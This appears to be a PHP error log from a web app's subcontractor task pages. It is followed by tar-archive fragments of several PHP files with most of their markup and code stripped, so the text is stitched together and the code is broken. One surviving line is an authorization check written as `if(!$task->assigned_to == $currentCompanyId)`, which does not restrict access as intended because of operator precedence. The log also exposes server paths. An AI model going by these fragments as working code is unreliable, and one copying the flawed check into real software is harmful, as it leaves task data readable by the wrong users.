Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 05:26:45 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 05:27:55 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 05:27:55 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 05:30:19 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 05:36:37 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 05:37:10 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 05:38:27 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 05:42:04 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 05:42:04 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 05:42:41 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 05:43:14 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 05:43:14 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 05:43:39 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 05:47:12 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 05:47:12 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 06:00:50 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 06:00:50 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 06:03:19 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 06:03:19 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 06:07:24 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 06:07:24 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 06:12:48 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 06:12:48 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 06:14:55 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 06:14:55 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 06:35:57 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 06:36:05 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 06:36:05 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 06:36:42 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 06:36:42 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 06:45:29 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 06:45:29 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 06:45:50 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 06:45:56 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 06:45:56 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 06:46:30 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 06:46:30 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 06:47:34 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 06:47:34 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 06:48:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 06:48:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 06:48:47 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 06:48:47 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 06:59:27 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 06:59:27 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 07:00:02 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 07:00:10 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 07:00:21 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 07:00:21 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 07:00:34 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 07:01:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 07:01:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 07:03:17 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 07:03:17 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 07:03:35 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 07:10:10 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 07:30:16 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 08:12:16 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 09:35:32 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 11:46:28 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 14:22:14 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 00:35:52 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 02:07:07 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 03:02:51 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 03:14:15 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 03:28:51 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 04:15:11 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 05:21:14 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 05:28:50 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 05:39:43 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 05:51:21 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 05:51:36 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [10-Apr-2025 05:51:36 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [10-Apr-2025 05:55:18 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [10-Apr-2025 05:55:18 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [10-Apr-2025 06:00:02 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 07:16:52 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 07:45:50 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 08:22:22 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 09:40:39 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 09:44:23 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 12:03:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 12:35:55 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 14:52:43 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 16:27:55 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 01:03:27 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 01:16:41 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 01:26:31 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 01:44:24 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 02:32:39 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 03:12:38 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 03:23:01 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 04:16:13 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 04:21:17 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 04:41:26 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 04:51:27 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 04:51:39 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 04:51:39 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 05:12:42 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 05:12:42 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 05:17:08 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 05:19:23 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 05:19:23 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 05:22:07 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 05:22:07 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 05:31:27 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 05:31:27 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 05:32:11 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 05:32:11 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 05:38:06 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 05:38:06 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 05:38:10 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 05:38:10 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 05:39:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 05:39:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 05:44:40 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 05:44:40 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 05:44:56 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 05:44:56 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 05:52:33 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 05:52:55 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 05:52:55 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 05:54:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 05:54:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 06:00:55 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 06:05:52 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 06:05:52 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 06:16:12 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 07:32:43 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 08:23:52 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 08:24:14 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 08:24:14 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 08:33:18 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 08:33:28 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 08:33:28 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 08:36:12 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 08:36:12 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 08:36:50 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 08:36:50 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 08:37:25 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 08:37:25 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 08:39:39 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 08:39:40 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 17:50:34 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 17:51:21 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 17:51:46 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [17-Sep-2025 10:45:42 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [17-Sep-2025 10:51:06 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [17-Sep-2025 10:51:37 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [17-Sep-2025 11:13:10 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [17-Sep-2025 11:13:47 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [17-Sep-2025 11:44:11 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [17-Sep-2025 11:44:29 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 subcontractor/viewtasksassignedtome.php000064400000034573151676701240014615 0ustar00getAllServicesForDropdown(); // Create TaskService instance $taskService = new TaskService(); $tasks = $taskService->getTasksByAssignedIdNotAccepted($companyId); ?>

View Tasks

ID Service Name Region Frequency Created At Actions
id; ?> service_name; ?> region; ?> frequency; ?> created_at)); ?> View Details
subcontractor/navbar.php000064400000010126151676701240011427 0ustar00subcontractor/viewassignedtask.php000064400000045052151676701240013537 0ustar00 decryptData($_GET['id']); $task = $taskService->getTaskById($taskId); if(!$task->assigned_to == $currentCompanyId) { echo ''; exit(); } } else { echo '

No task ID provided.

'; exit(); } ?>
is_assigned == 1 && $task->assigned_to == $currentCompanyId) { echo ' '; } else{ echo ''; } ?>
is_assigned == 1 && $task->assigned_to == $currentCompanyId) : ?>

service_name; ?>

region; ?>
schedule_name; ?>
frequency; ?>

isPublic ? 'Open to accept' : 'Task Assigned'); ?>

This task is assigned to your company.
dates is a JSON string $datesJson = $task->dates; // Decode the JSON string to an array $datesArray = json_decode($datesJson, true); // Extract the dates and format them for JavaScript $formattedDates = array_map(function ($dateEntry) { return '"' . $dateEntry['date'] . '"'; }, $datesArray); $jsDates = implode(",", $formattedDates); // Convert the array to a comma-separated string ?>

Subtasks

getSubtasksByTaskId($taskId); // Display subtasks if ($subtasks) { echo ''; foreach ($subtasks as $subtask) { echo ''; } echo '
Date Time
' . $subtask->subtask_date . ' ' . ($subtask->subtask_time ? $subtask->subtask_time : "Not set") . '
'; } else { echo '

No subtasks found for this task.

'; } ?>
subcontractor/assigntasks.php000064400000014410151676701240012510 0ustar00getAllServicesForDropdown(); // Create TaskService instance $taskService = new TaskService(); $tasks = $taskService->getTasksWithUnassignedSubtasks($companyId); ?>

View Tasks

ID Service Name Region Frequency Created At Completed Actions
id; ?> service_name; ?> region; ?> frequency; ?> created_at)); ?> View Details
